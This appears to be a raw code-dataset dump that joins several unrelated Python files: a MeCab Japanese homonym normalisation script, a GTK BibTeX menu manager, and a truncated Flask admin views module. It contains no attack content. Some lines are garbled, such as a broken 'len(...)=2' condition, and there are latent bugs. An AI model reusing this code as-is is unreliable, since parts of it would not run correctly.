KanaRepr=LiNe.strip().split()\n if len(KanaRepr)==2:\n Wd,Repr=KanaRepr[0],KanaRepr[1]\n WdsReprs[Wd]=Repr\n return WdsReprs\n\ndef upto_char(Str,Chars):\n Substr=''\n for Char in Str:\n if Char in Chars:\n break\n else:\n Substr+=Char\n return Substr\n\ndef normalise_mecabfile(FP,RelvFts,ClusteredHs,OutFP=None,RelvFtCnt=7,CorpusOrDic='corpus',KanaOnly=True,UnnormalisableMarkP=True):\n # outfp could be none, true or string\n if not OutFP:\n Out=sys.stdout\n else:\n if OutFP is True:\n TmpOutFP=FP+'.normed.tmp'\n else:\n TmpOutFP=OutFP+'.tmp'\n Out=open(TmpOutFP,'wt')\n\n AlreadyNormedCommonFtsVals=set()\n MSs,Consts=None,myModule.prepare_progressconsts(FP)\n FSr=open(FP)\n ClusteredHDic={tuple(ClusterH.cluster_on):ClusterH for ClusterH in ClusteredHs}\n for Cntr,LiNe in enumerate(FSr):\n if Cntr+1%1000==0:\n MSs=myModule.progress_counter(MSs,Cntr,Consts)\n if not LiNe.strip():\n continue\n if CorpusOrDic=='corpus' and LiNe=='EOS\\n':\n AsItIs=True\n elif KanaOnly and not myModule.all_of_chartypes_p(upto_char(LiNe,[',','\\t']),['hiragana','katakana','roman']):\n AsItIs=True\n else:\n CommonFtsVals=tuple(mecabtools.pick_feats_fromline(LiNe,RelvFts,CorpusOrDic=CorpusOrDic))\n if CorpusOrDic=='corpus' and len(CommonFtsVals)=2:\n sys.stderr.write('\\nnormalised automatically for '+ClusteredH.hiragana_rendering+'\\n')\n ToWrite=NormalisedWd.get_mecabline(CorpusOrDic=CorpusOrDic)+'\\n'\n if CorpusOrDic=='dic':\n AlreadyNormedCommonFtsVals.add(CommonFtsVals)\n else:\n if CorpusOrDic=='corpus' and UnnormalisableMarkP:\n ToWrite='\\nNot automatically normalisable:\\n'+LiNe+'\\n'.join([KanjiWd.orth for KanjiWd in ClusteredH.kanji_tops])+'\\n\\n'\n else:\n ToWrite=LiNe\n \n Out.write(ToWrite)\n \n FSr.close()\n if OutFP:\n Out.close()\n os.rename(TmpOutFP,OutFP)\n\ndef get_clustered_homs(LexFPs,*Args,**KWArgs):\n ClusteredH=[]\n for LexFP in LexFPs:\n if Debug:\n sys.stderr.write('\\n\\nfinding homonym clusters with the lexicon '+LexFP+'\\n\\n')\n ClusteredH.extend(get_clustered_homs_file(LexFP,*Args,**KWArgs))\n return ClusteredH\n \ndef get_clustered_homs_file(LexFP,RelvFts,Frequents=set(),ProbExemplars={},OutFP=None):\n RelvInds=mecabtools.fts2inds(RelvFts,CorpusOrDic='dic')\n if Debug:\n print('doing the raw clustering')\n FtLines={ Ft:Lines for (Ft,Lines) in mecabtools.cluster_samefeat_lines(LexFP,RelvInds).items() if len(Lines)>=2 and Ft[-1]!='*' }\n\n ClusteredHs=[]\n MSs,Consts=None,myModule.prepare_progressconsts(FtLines)\n for Cntr,(FtSet,Lines) in enumerate(FtLines.items()):\n if Debug and Cntr+1%100==0:\n MSs=myModule.prepare_progressconsts(MSs,Cntr,Consts)\n MWds=[ mecabtools.mecabline2mecabwd(Line,CorpusOrDic='dic') for Line in Lines ]\n if Frequents and not any(MWd.orth in Frequents for MWd in MWds):\n continue\n FtSetLabeled=list(zip(RelvFts,FtSet))\n myCHs=ClusteredHomonyms(MWds,FtSetLabeled)\n myCHs.set_exemplar(ProbExemplars)\n ClusteredHs.append(myCHs)\n return ClusteredHs\n\n \ndef collect_freq_wds(FreqWdFP,RankUpTo,HiraganaOnly=False):\n Wds=set()\n with open(FreqWdFP) as FSr:\n for Cntr,LiNe in enumerate(FSr):\n if Cntr==RankUpTo-1:\n break\n Wd=LiNe.strip().strip().split()[-1]\n if HiraganaOnly:\n if myModule.all_of_chartypes_p(Wd,['hiragana']):\n Wds.add(Wd)\n else: \n Wds.add(Wd)\n return Wds\n \n \nclass ClusteredHomonyms:\n def __init__(self,MecabWds,ClusterOn):\n if self.homonymity_check(MecabWds):\n self.cluster_on=tuple(ClusterOn)\n self.hiragana_rendering=jp_morph.kana2kana(self.cluster_on[-1][1])\n self.cluster_str=','.join([Val for (_,Val) in ClusterOn ])\n (KanaC,KanjiCs)=self.cluster_homonyms(MecabWds)\n self.kana_cluster=KanaC\n self.kana_lemma='unknown' if not self.kana_cluster else self.kana_cluster[0].lemma\n self.kanji_clusters=KanjiCs\n self.kanji_tops=[KanjiC[0] for KanjiC in self.kanji_clusters]\n #self.interkanji_dist=InterkanjiDist\n ReprType,ReprWds=self.pick_representative()\n self.represent_wds=ReprWds\n self.represent_type=ReprType\n # exemplar is dynamically set with set_exemplar\n self.exemplar=None\n\n def special_kana_exemplar_p(self):\n # いる なる やる ある only for now\n Specials={'いる':{'infpat':'一段'},'なる':{'cat':'動詞'},'やる':{'cat':'動詞'},'ある':{'cat':'動詞'}}\n Bool=False\n if self.kana_lemma in Specials.keys():\n FtValPairs=Specials[self.kana_lemma]\n if all(self.represent_wds[0].__dict__[Ft]==Val for (Ft,Val) in FtValPairs.items()):\n Bool=True\n \n return Bool\n \n def set_exemplar(self,ProbExemplars):\n Normalisable=False;Exemplar=None\n if self.special_kana_exemplar_p():\n # special exceptions where you don't convert to kanji\n Exemplar=self.kana_cluster[0]\n elif not self.kanji_clusters:\n # kana only case\n Normalisable=True\n Exemplar=self.kana_cluster[0]\n elif len(self.kanji_clusters)==1:\n # nonambiguous kanji case\n Normalisable=True\n Exemplar=self.represent_wds[0]\n elif self.kana_lemma in ProbExemplars.keys():\n ExemplarWds= [Wd for Wd in myModule.flatten_list(self.kanji_clusters) if Wd.lemma in ProbExemplars.values()]\n if ExemplarWds:\n Normalisable=True\n Exemplar=ExemplarWds[0]\n \n self.exemplar=Exemplar\n return Normalisable\n \n def pick_representative(self,Criterion='rate'):\n if not (self.kana_cluster or self.kanji_clusters):\n sys.exit('something is wrong, no cluster content')\n else:\n# # this means only kanji clusteres are populated\n # if not self.kana_cluster:\n # return ('kanji',self.kanji_clusters[0][0])\n # #and this, only kana cluster exists\n # elif not self.kanji_clusters:\n # return ('kana',self.kana_cluster[0])\n # # the following two are when both exist, and then, it depens on the count\n # else:\n if Criterion=='count':\n if self.kana_cluster[0].count*0.6>self.kanji_clusters[0][0].count:\n return 'kana',self.kana_cluster[0]\n else:\n return 'kanji',self.kanji_clusters[0][0]\n else:\n if not self.kanji_clusters:\n return 'kana',[jp_morph.pick_highest_charrate(self.kana_cluster,['hiragana'])[0]]\n else:\n return 'kanji',[jp_morph.pick_highest_charrate(Cluster,['han'])[0] for Cluster in self.kanji_clusters]\n\n def homonymity_check(self,MecabWds):\n Bool=True; PrvPron=None\n for MecabWd in MecabWds:\n if PrvPron:\n if MecabWd.pronunciation!=PrvPron:\n Bool=False\n break\n PrvPron=MecabWd.pronunciation\n return Bool\n \n def cluster_homonyms(self,MecabWds,SortP=False):\n KanaCluster=[ Hom for Hom in MecabWds if myModule.all_of_chartypes_p(Hom.orth,['hiragana','katakana','roman']) ]\n if SortP:\n KanaCluster=sorted(KanaCluster,key=lambda x:x.count,reverse=True)\n\n KanjiClusters=[]\n for Cntr,Hom in enumerate(set(MecabWds)-set(KanaCluster)):\n if Cntr==0:\n KanjiClusters.append([Hom])\n else:\n for Cluster in KanjiClusters:\n if homonympair_identical_p(Cluster[-1],Hom):\n Cluster.append(Hom)\n break\n else:\n KanjiClusters.append([Hom])\n\n if SortP:\n # sorting, inside a kanji cluster\n KanjiClusters=[ sorted(Cluster,key=lambda x:x.count,reverse=True) for Cluster in KanjiClusters ]\n # sorting, between clusters\n if len(KanjiClusters)>=2:\n KanjiClusters=sorted( KanjiClusters, key=lambda x:x[0].count, reverse=True )\n# InterClusterDist=probability.DiscDist({ KanjiCluster[0]:KanjiCluster[0].count for KanjiCluster in KanjiClusters },Smooth=True)\n \n return KanaCluster,KanjiClusters\n #,InterClusterDist\n\n def order_clusters(self):\n if not self.kanji_clusters:\n OrderedReprs=[self.order_by_countscore(self.kana_cluster)]\n else:\n OrderedReprs=[]\n for KanjiC in self.kanji_clusters:\n OrderedReprs.append(self.order_by_countscore(self.kana_cluster.union(KanjiC)))\n self.ordered_clusters=sorted(OrderedReprs,key=lambda x: x[0].count, reverse=True)\n \n def order_by_countscore(self,OrgWds,RareKanjiScale=4):\n ApplyRKS=False\n Wds=copy.copy(OrgWds)\n RareKanjis= [Wd for Wd in Wds if Wd.count<5 and any(myModule.identify_chartype(Char)=='han' for Char in Wd.orth)]\n if RareKanjis:\n ApplyRKS=True\n WdsScores=[]\n for Wd in Wds:\n if ApplyRKS:\n if Wd in RareKanjis:\n WdsScores.append((Wd,(Wd.count+1)*RareKanjiScale))\n elif myModule.all_of_chartypes_p(Wd.orth,['hiragana','katakana']):\n WdsScores.append((Wd,Wd.count//RareKanjiScale))\n else:\n WdsScores.append((Wd,Wd.count))\n else:\n WdsScores.append((Wd,Wd.count))\n return [ Wd for (Wd,Score) in sorted(WdsScores,key=lambda x:x[1],reverse=True) ]\n\n def show_summary(self):\n get_wdcntstrs=lambda Cl: [ Wd.orth+' '+str(Wd.count) for Wd in Cl]\n Lines=[]\n Lines.append(self.hiragana_rendering)\n Lines.append(repr(self.cluster_on))\n Lines.append(repr([Wd.orth for Wd in self.represent_wds]))\n ExemplarStr='Exempar: '\n if self.exemplar:\n ExemplarStr+=self.exemplar.orth\n else:\n ExemplarStr+=' NONE'\n Lines.append(ExemplarStr)\n Lines.append('kana cluster: '+' '.join(get_wdcntstrs(self.kana_cluster)))\n KanjiClustersStr=''\n if self.kanji_clusters:\n for Cl in self.kanji_clusters:\n KanjiClustersStr+=' '.join(get_wdcntstrs(Cl))+' / '\n Lines.append('kanji clusters: '+KanjiClustersStr)\n #LineElsIKD=[]\n# if len(self.kanji_clusters)>=2:\n # for (Evt,Prob) in self.interkanji_dist.evtprob.items():\n # LineElsIKD.append(Evt.orth+str(Prob))\n #Lines.append('kanji-conversion ratio '+' '.join(LineElsIKD))\n return '\\n'.join(Lines)\n\ndef output_model_text(Homs,Out):\n FSw=open(Out,'wt')\n for Hom in Homs:\n try:\n ClusterStr=Hom.show_summary()\n except:\n Hom.show_summary()\n FSw.write(ClusterStr+'\\n\\n')\n \n FSw.close()\n\n\ndef main00(CorpusFPs,LexFP,FtNums,AdditionalLexs=[],OutputModelText=None, CorpusOnly=False,UsePrevClusteredHoms=None,Debug=0):\n \n if UsePrevClusteredHoms:\n PickleFP=UsePrevClusteredHoms\n else:\n PickleFP='_'.join(CorpusFPs)+'_'+os.path.basename(LexFP)+'.clusteredhoms.pickle'\n (ClusteredHoms,_)=myModule.ask_filenoexist_execute_pickle(PickleFP,create_clustered_homonyms,([CorpusFPs,LexFP,FtNums],{}))\n if OutputModelText:\n OutFP=PickleFP.replace('.pickle','.txt')\n output_model_text(ClusteredHoms,OutFP)\n \n print('\\nextracting items to normalise...')\n WdsRepls=extract_wds2normalise(ClusteredHoms)\n\n print('\\nnormalising corpora...')\n normalise_mecab(CorpusFPs,WdsRepls,'corpus',Debug=Debug)\n\n if not CorpusOnly:\n print('\\nnormalising main lexicon...')\n normalise_mecab([LexFP],WdsRepls,'lex')\n if AdditionalLexs:\n print('\\nnormalising other lexicons...')\n normalise_mecab(AdditionalLexs,WdsRepls,'simplelex')\n\n \ndef create_clustered_homonyms(CorpusFPs,LexFP,FtNums):\n print('\\nfirst we do the raw counts')\n ClusteredWds=count_variants(CorpusFPs)\n print('\\nnow we collect non-ocurring items from the lexicon')\n ClusteredWds=augment_withnulloccs(ClusteredWds,FtNums,LexFP)\n print('\\nnow we cluster homonyms')\n ClusteredHoms=normalise_clustered_wds(ClusteredWds)\n return ClusteredHoms\n\ndef normalise_mecab(Files, WdsRepls, LorC='corpus',Debug=0):\n for File in Files:\n print('normalising '+File)\n normalise_mecab_file(File,WdsRepls,LorC,Debug=Debug)\n\ndef normalise_mecab_file(InputFP,WdsRepls,LexOrCorpus,OutputDiff=True,Debug=0):\n\n def return_match_ifany(Line,LinesRepls,LexOrCorpus,Regex):\n if LexOrCorpus=='lex':\n LineForm=re.sub(Regex,'\\t',Line)\n elif LexOrCorpus=='simplelex':\n LineForm=Line.split('\\t')[0]\n else:\n LineForm=Line\n if LineForm in LinesRepls.keys():\n ToReturn=LinesRepls[LineForm]\n else:\n ToReturn=None\n return ToReturn\n\n LinesRepls={ Wd.get_mecabline():Repl for (Wd,Repl) in WdsRepls.items() }\n\n FSr=open(InputFP)\n FSw=open(InputFP+'.normed','wt')\n\n Regex=re.compile(r',([0-9]+,){3}')\n if Debug:\n TgtLines=set([Line for Line in LinesRepls.keys()])\n SrcLinesUpTo100k=set();AllP=False\n for i in range(100000):\n Next=FSr.readline()\n if not Next:\n AllP=True\n break\n else:\n SrcLinesUpTo100k.add(Next.strip())\n if LexOrCorpus=='lex':\n SrcLinesUpTo100k={re.sub(Regex,'\\t',Line) for Line in SrcLinesUpTo100k}\n Intersect=TgtLines.intersection(SrcLinesUpTo100k)\n \n FSr.seek(0)\n\n if not Intersect:\n if AllP:\n print('there is no match, no point processing')\n else:\n print('there is no match for the first 100k, probable that there is none')\n if OutputDiff:\n FSwDiff=open(InputFP+'.diff','wt')\n show_linediff=lambda LiNe1,LiNe2: LiNe1.strip()+'\\n'+LiNe2.strip()\n for Cntr,LiNe in enumerate(FSr):\n Alt=return_match_ifany(LiNe.strip(),LinesRepls,LexOrCorpus,Regex)\n if Alt:\n AmbP=False\n if LexOrCorpus=='corpus':\n if isinstance(Alt,mecabtools.MecabWdParse):\n Picked=Alt\n else:\n Picked=probability.rand_biased(Alt)\n AmbP=True\n NewLiNe=Picked.get_mecabline()+'\\n'\n\n if OutputDiff:\n if AmbP:\n FSwDiff.write('ambiguous case, competitors are: ')\n FSwDiff.write(repr([(Wd.orth,Prob) for (Wd,Prob) in Alt.evtprob.items()])+'\\n')\n FSwDiff.write(show_linediff(LiNe,NewLiNe)+'\\n\\n')\n\n FSw.write(NewLiNe)\n else:\n print('found')\n pass\n else:\n FSw.write(LiNe)\n if OutputDiff:\n FSwDiff.close()\n FSr.close();FSw.close()\n\n\ndef extract_wds2normalise(HomCs,Debug=0):\n Wds2Normalise={}\n for HomC in HomCs:\n # if the representative is all-kana, we render everything that representative\n if HomC.represent_type=='kana':\n # that means the targets are everything except the representative itself\n Wds2Change2Kana=HomC.kana_cluster[1:]+myModule.flatten_list(HomC.kanji_clusters)\n for Wd2Change2Kana in Wds2Change2Kana:\n Wds2Normalise[Wd2Change2Kana]=HomC.represent_wd\n # on the other hand if it includes kanji, we keep the top ranked element in each cluster\n elif HomC.represent_type=='kanji':\n for KanaWd in HomC.kana_cluster:\n IKD=HomC.interkanji_dist\n KanjiWd=(list(IKD.evtprob.keys())[0] if IKD.evtcount==1 else IKD)\n Wds2Normalise[KanaWd]=KanjiWd\n for KanjiC in HomC.kanji_clusters:\n for NonTopKanjiWd in KanjiC[1:]:\n Wds2Normalise[NonTopKanjiWd]=KanjiC[0]\n return Wds2Normalise\n\n\ndef pick_corefts(Fts):\n return tuple([(NumsFts[Num],Fts[Num]) for Num in CoreFtNums])\n \n\ndef count_variants(MecabCorpusFPs):\n CumCoreFtsCnts={}\n for FP in MecabCorpusFPs:\n CoreFtsCntsPerCorpus=mecabtools.count_words(FP)\n CumCoreFtsCnts=myModule.merge_countdics(CumCoreFtsCnts,CoreFtsCntsPerCorpus)\n \n ClusteredWdsCnts=wdscnts2clusteredcnts(CumCoreFtsCnts)\n return ClusteredWdsCnts\n\ndef wdscnts2clusteredcnts(WdsCnts):\n Clustered={}\n\n for (Wd,Fts),Cnt in WdsCnts.items():\n \n FtsDic={'orth':Wd}\n for Num in range(9):\n FtsDic[NumsFts[Num]]=Fts[Num]\n # here you make an wd obj\n MWd=mecabtools.MecabWdParse(**FtsDic)\n MWd.set_count(Cnt)\n RelvFts=pick_corefts(Fts)\n #tuple([ (NumsFts[Num],Fts[Num]) for Num in ClusterOn ])\n \n if RelvFts not in Clustered.keys():\n Clustered[RelvFts]={MWd}\n else:\n Clustered[RelvFts].add(MWd)\n ClusteredMoreThan1={ Header:Wds for Header,Wds in Clustered.items() if len(Wds)>=2 }\n return ClusteredMoreThan1\n\n\ndef wdcnt2wdfts(CoreFts,WdsCnts):\n WdFts=[]\n for (Wd,OtherFts) in WdsCnts:\n WdFts.append((Wd,CoreFts[:-1]+OtherFts+CoreFts[-1:]))\n return WdFts\n\ndef augment_withnulloccs(ClusteredWds,FtNums,LexFP):\n for Cntr,LexLiNe in enumerate(open(LexFP)):\n if not mecabtools.not_proper_jp_p(LexLiNe):\n WdFtPairInLex=mecabtools.line2wdfts(LexLiNe,'dic')\n Orth,FtsLex=WdFtPairInLex\n if len(FtsLex)!=9:\n sys.stderr.write('something wrong with Line: '+str(Cntr+1)+' '+LexLiNe)\n continue\n Fts={}\n Fts['orth']=Orth\n Fts.update([ (NumsFts[Cntr],Val) for (Cntr,Val) in enumerate(FtsLex) ])\n WdInLex=mecabtools.MecabWdParse(**Fts)\n WdInLex.lexpos=Cntr+1\n CoreFtsLexLine=tuple([(NumsFts[Column-1],FtsLex[Column-1]) for Column in FtNums])\n # check if the dic entry is in the cluster set\n if CoreFtsLexLine in ClusteredWds.keys():\n # if it is, check the whole entry exists in it by checking noncore features match\n Cluster=ClusteredWds[CoreFtsLexLine]\n Fnd=False\n for WdInCorpus in Cluster:\n if all(WdInCorpus.__dict__[NonCoreFt] == WdInLex.__dict__[NonCoreFt] for NonCoreFt in NonCoreFts):\n Fnd=True\n WdInCorpus.lexpos=Cntr+1\n break\n if not Fnd:\n WdInLex.count=0\n ClusteredWds[CoreFtsLexLine].add(WdInLex)\n \n return ClusteredWds\n\ndef sift_list_relv_irrelv(List,Conditions=[],CntrConditions=[]):\n Relvs = []; Irrelvs = []\n for Cntr,El in enumerate(List):\n if all(Condition(El) for Condition in Conditions) and all(CntrCondition(Cntr) for CntrCondition in CntrConditions):\n Relvs.append(El)\n else:\n Irrelvs.append(El)\n return tuple(Relvs),tuple(Irrelvs)\n \n\ndef normalise_clustered_wds(ClusteredWds,Exclude=(),Debug=0):\n FtsReprs=[]\n for CoreFts,Cluster in ClusteredWds.items():\n Cluster=list(Cluster)\n if len(Cluster)==1:\n\n sys.stderr.write('no ambiguity\\n')\n# sys.stdout.write(Lines[0]+'\\n')\n else:\n if Debug:\n sys.stderr.write('\\ncandidates')\n sys.stderr.write('\\n'+repr([Wd.orth for Wd in Cluster])+'\\n')\n\n MyHoms=ClusteredHomonyms(Cluster,CoreFts)\n if Debug:\n print(MyHoms.show_summary())\n FtsReprs.append(MyHoms)\n \n return FtsReprs\n\n\ndef reduce_infwds(LexemeClusters,Debug=0):\n #WdFts should be a pair, word and features\n NewLexCs=OrderedDict()\n for LexemeFts,Lines in LexemeClusters.items():\n if LexemeFts[0] in ('動詞','形容詞'):\n ReprLineEls=reduce_infwd(LexemeFts,Lines)\n NewLexCs[LexemeFts]=[','.join(ReprLineEls)]\n else:\n NewLexCs[LexemeFts]=Lines\n return NewLexCs\n\ndef reduce_infwd(LexemeFts,Lines):\n def change_last_char(Str):\n if Str[-1]=='う':\n return Str[:-1]+'w'\n elif Str[-1]=='え':\n return Str[:-1]\n else:\n return Str[:-1]+romkan.to_hepburn(Str[-1])[0]\n\n (PoS,SubCat,_,_,InfType,InfCat)=LexemeFts\n\n ReprLineEls=next(Line for Line in Lines if Line.split(',')[9]=='基本形').split(',')\n DanGyo=InfType.split('・')\n if DanGyo[0]=='五段':\n ReprLineEls=[ change_last_char(ReprLineEl) if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n \n elif DanGyo[0]=='一段' or PoS=='形容詞':\n ReprLineEls=[ ReprLineEl[:-1] if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n\n return ReprLineEls\n\n\ndef choose_from_homonyms(Homs): \n return Homs.pop(),Homs\n\n#### CORE STUFF #####\ndef homonympair_identical_p(Homonym1,Homonym2):\n # trivial case\n if Homonym1.orth==Homonym2.orth:\n Bool=True\n else:\n # default is true\n Bool=True\n # but don't accept kanji-only pairs as synonyms\n if all(myModule.all_of_chartypes_p(Homonym.orth,['han']) for Homonym in (Homonym1,Homonym2)):\n Bool=False\n # otherwise, we take all the kanjis from each and if one does not contain another, we say they're not synonyms\n Kanjis1={ Char for Char in Homonym1.orth if myModule.identify_type_char(Char)=='han'}\n Kanjis2={ Char for Char in Homonym2.orth if myModule.identify_type_char(Char)=='han'}\n if not (Kanjis1.issubset(Kanjis2) or Kanjis2.issubset(Kanjis1)):\n Bool=False\n #otherwise it's a synonym\n else:\n Bool=True\n \n return Bool\n\n\n\ndef cluster_possibly_ambiguous_p(Cluster):\n KanaTypes=['hiragana','katakana','roman']\n KanjiContained=[Wd for Wd in Cluster if not myModule.all_of_chartypes_p(Wd.orth,KanaTypes)]\n if Debug:\n print([Wd.orth for Wd in Cluster])\n #if theres no kanji, they're just the same\n if not KanjiContained:\n Bool= False\n else:\n Bool=any(not homonympair_identical_p(Wd1,Wd2) for (Wd1,Wd2) in itertools.combinations(Cluster,2))\n\n if Debug:\n DebugStr=('ambiguous' if Bool else 'unambiguous')\n print(DebugStr+'\\n')\n \n return Bool\n\n\n \ndef main():\n import argparse,glob\n\n APsr=argparse.ArgumentParser()\n APsr.add_argument('-l','--lexicon-dir',required=True)\n APsr.add_argument('mecab_corpus_dir')\n APsr.add_argument('--debug',type=int,default=0)\n APsr.add_argument('--previous-clusteredhoms',default=None)\n APsr.add_argument('--additional-lexs',nargs='+',default=[])\n #APsr.add_argument('--corpus-only',action='store_true')\n APsr.add_argument('--unnormalisable-unmark',action='store_true')\n APsr.add_argument('--output-text',action='store_true')\n APsr.add_argument('-f','--freq-word-fp')\n APsr.add_argument('-e','--exemplar-fp')\n \n Args=APsr.parse_args()\n\n FPSets=[]\n for Dir,Ext in ((Args.lexicon_dir,'csv'),(Args.mecab_corpus_dir,'mecab')):\n if not os.path.isdir(Dir):\n sys.exit('\\n\\nspecified dir does not exist: '+Dir+'\\n')\n else:\n FPs=glob.glob(os.path.join(Dir,'*.'+Ext))\n if not FPs:\n sys.exit('\\n\\nno right file in specified dir: '+Dir+'\\n')\n else:\n FPSets.append(FPs)\n \n # generally, the exemplar file should be in the lex dir, the frequency file in the corpusdir\n AssistFPs=[ (Type,AssistFP) for (Type,AssistFP) in (('freq_word_fp',Args.freq_word_fp),('exemplar_fp',Args.exemplar_fp)) if AssistFP ]\n for Type,AssistFP in AssistFPs:\n if '/' not in AssistFP:\n Dir=Args.mecab_corpus_dir if Type=='freq_word_fp' else Args.lexicon_dir\n FP=os.path.join(Dir,AssistFP)\n if os.path.isfile(FP):\n Args.__dict__[Type]=FP\n else:\n sys.exit('AssistFP '+FP+' does not exist')\n \n main0(FPSets[0],FPSets[1],FreqWdFP=Args.freq_word_fp,ProbExemplarFP=Args.exemplar_fp,UnnormalisableMarkP=not Args.unnormalisable_unmark)\n\n\n\n\nif __name__=='__main__':\n main()\n","sub_path":"normalise_jp_shared/normalise_mecab.py","file_name":"normalise_mecab.py","file_ext":"py","file_size_in_byte":28193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"197608192","text":"import gi\n# import pybib\n# import view\n# import os\nimport io\nfrom gi.repository import Gtk\ngi.require_version(\"Gtk\", \"3.0\")\n\n\nclass MenuManager:\n\n def __init__(self):\n self.parsing = pybib.parser()\n self.TreeView = view.treeview()\n\n def file_new_clicked(self, widget):\n dialog = Gtk.FileChooserDialog(\"Open an existing fine\", None,\n Gtk.FileChooserAction.OPEN,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n # self.add_filters(dialog)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n self.filename = dialog.get_filename()\n return(self.filename)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n\n dialog.destroy()\n\n def file_open_clicked(self, SimpleAction, parameter):\n dialog = Gtk.FileChooserDialog(\"Open an existing fine\", None,\n Gtk.FileChooserAction.OPEN,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n filter = Gtk.FileFilter()\n filter.set_name(\"BiBTex File\")\n filter.add_pattern(\"*.bib\")\n dialog.add_filter(filter)\n filter = Gtk.FileFilter()\n filter.set_name(\"All Files\")\n filter.add_pattern(\"*\")\n dialog.add_filter(filter)\n\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n filename = dialog.get_filename()\n dialog.destroy()\n del self.TreeView.full_list[:]\n del self.parsing.booklist[:]\n self.TreeView.bookstore.clear()\n self.TreeView.indxcount = 0\n with open(filename, \"r\") as filename:\n self.parsing.parsing_read(filename)\n self.TreeView.viewer(self.parsing.booklist)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n dialog.destroy()\n\n def file_save_as_clicked(self, SimpleAction, parameter):\n dialog = Gtk.FileChooserDialog(\"Save as an existing file\", None,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_SAVE, Gtk.ResponseType.OK))\n filter = Gtk.FileFilter()\n filter.set_name(\"BiBTex File\")\n filter.add_pattern(\"*.bib\")\n dialog.add_filter(filter)\n filter = Gtk.FileFilter()\n filter.set_name(\"All Files\")\n filter.add_pattern(\"*\")\n dialog.add_filter(filter)\n\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n filename = dialog.get_filename()\n print(filename)\n self.parsing.parsing_write(filename)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n dialog.destroy()\n\n def on_menu_file_quit(self, widget):\n Gtk.main_quit()\n\n # def on_menu_others(self, widget):\n # print(\"Menu item \" + widget.get_name() + \" was selected\")\n\n # def on_menu_choices_changed(self, widget, current):\n # filename = current.get_name()+\".xml\"\n # print(filename + \" will be opened\")\n\n def create_textview(self, SimpleAction, parameter):\n self.popup = Gtk.Window()\n self.popup.set_title(\"Add a complete bibtex entry\")\n self.popup.set_default_size(350, 350)\n grid = Gtk.Grid()\n scrolw = Gtk.ScrolledWindow()\n scrolw.set_hexpand(True)\n scrolw.set_vexpand(True)\n button = Gtk.Button(\"Create\")\n button.connect(\"clicked\", self.create_from_buffer)\n tview = Gtk.TextView()\n tview.set_wrap_mode(Gtk.WrapMode.WORD)\n\n # Get the buffer\n self.textbuffer = tview.get_buffer()\n scrolw.add(tview)\n grid.attach(scrolw, 0, 0, 10, 10)\n grid.attach(button, 0, 11, 10, 1)\n self.popup.add(grid)\n self.popup.show_all()\n\n def create_from_buffer(self, widget):\n start_iter = self.textbuffer.get_start_iter()\n end_iter = self.textbuffer.get_end_iter()\n text = io.StringIO(self.textbuffer.get_text(start_iter,\n end_iter, True))\n del self.parsing.booklist[:]\n self.parsing.parsing_read(text)\n self.TreeView.viewer(self.parsing.booklist)\n self.popup.destroy()\n","sub_path":"ptbl/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"198661524","text":"#app/admin/views\n\nfrom flask import abort, render_template, url_for, redirect, flash\nfrom flask_login import current_user, login_required\n\nfrom . import admin\nfrom .forms import DepartmentForm, RoleForm, EmployeeAssignForm\nfrom .. import db\nfrom ..models import Department, Role, Employee\n\ndef check_admin():\n\n \"\"\"\n prevent non-admin user to access this page\n\n \"\"\"\n if not current_user.is_admin:\n abort(403)\n\n@admin.route('/departments/list', methods=['GET','POST'])\n@login_required\ndef list_departments():\n \"\"\"\n List all departments\n\n \"\"\"\n\n check_admin()\n departments = Department.query.all()\n return render_template('list_departments.html', departments=departments, title='Departments')\n\n@admin.route('/departments/add', methods=['GET','POST'])\n@login_required\ndef add_department():\n\n \"\"\"\n add department to the database\n\n \"\"\"\n check_admin()\n add_department = True\n\n form = DepartmentForm()\n if form.validate_on_submit():\n department = Department(name=form.name.data, description=form.description.data)\n try:\n # add department to the database\n\n db.session.add(department)\n db.session.commit()\n flash('You has successfully added a new department')\n except:\n # in case department name already exists\n flash('Error: Your new department name already exists')\n return redirect(url_for('admin.list_departments'))\n #load department template\n return render_template('department.html', action='Add', add_department=add_department, form=form, title='Add Department')\n\n\n@admin.route('/departments/edit/', methods=['GET','POST'])\n@login_required\ndef edit_department(id):\n\n \"\"\"\n edit a department\n\n \"\"\"\n check_admin()\n\n add_department=False\n department =Department.query.get_or_404(id)\n form = DepartmentForm(obj=department)\n if form.validate_on_submit():\n department.name=form.name.data\n department.description = form.description.data\n db.session.commit()\n flash('You have successfully edited this department')\n # return to list department page\n return redirect(url_for('admin.list_departments'))\n\n form.name.data = department.name\n form.description.data = department.description\n return render_template('department.html', action='Edit', add_department=add_department, department=department, form=form, title='Edit Depart,ent')\n\n\n@admin.route('/departments/delete/', methods=['GET','POST'])\n@login_required\ndef delete_department(id):\n \"\"\"\n delete a department from database\n\n \"\"\"\n\n check_admin()\n department =Department.query.get_or_404(id)\n db.session.delete(department)\n db.session.commit()\n\n flash('You have successfully deleted a department')\n\n return redirect(url_for('admin.list_departments'))\n\n return render_template(title='Delete Department')\n\n\n@admin.route('/roles/list', methods=['GET', 'POST'])\n@login_required\ndef list_roles():\n \"\"\"\n list all roles in the database\n \"\"\"\n check_admin()\n roles = Role.query.all()\n return render_template('list_roles.html', roles=roles, title='roles')\n\n@admin.route('/roles/add', methods=['GET','POST'])\n@login_required\ndef add_role():\n \"\"\"\n add a role into database\n \"\"\"\n 